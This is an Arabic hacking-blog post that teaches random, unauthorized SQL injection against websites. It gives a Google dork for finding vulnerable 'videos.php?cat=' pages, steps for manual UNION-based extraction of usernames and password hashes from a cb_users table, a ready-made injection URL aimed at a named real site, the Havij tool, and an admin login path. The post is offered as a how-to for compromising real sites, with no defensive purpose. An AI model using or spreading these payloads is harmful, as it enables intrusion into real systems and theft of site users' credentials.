حاسوبي الاختراق العشواءي دورك ثغرة SQL ~ قراصنة الجزائر
لا تنسو صلاتكم ان الصلات كانت على الموؤمنين كتابا موقوتا

الثلاثاء، 28 يناير 2014

الاختراق العشواءي دورك ثغرة SQL




بسم الله الرحمن الرحيم

 
ثغرة SQL

كود:
inurl:"videos.php?cat="
الاستغلال تقدر تستخدم برنامج havij أو

عن طريق الاستغلال اليدوي

تضيف اخر الرابط لما تطلع عدد العواميد

كود:
+from+cb_user
وبدال العامود المصاب

كود:
usern ame
شيل المسافة الموجودة في كلمة na me

ولما تاخذ اليوزر جاء وقت كلمة المرور

ضيف بدال العامود المصاب

كود:
password
المشكلة يطلع الباسورد في صورة هاش يصعب فكه

الي يلقى طريقة لفكه لا يبخل علينا في وضعها

مثال

كود:
http://alfatimi.tv/videos.php?cat=-1238+union+select+1,2,user****,4,5,6,7,8,9+from+cb_users--

مسار لوحة التحكم

كود:
http://localhost/admin_area/login.php
وفي الاخير كلمة شكر تكفي

0 التعليقات:

إرسال تعليق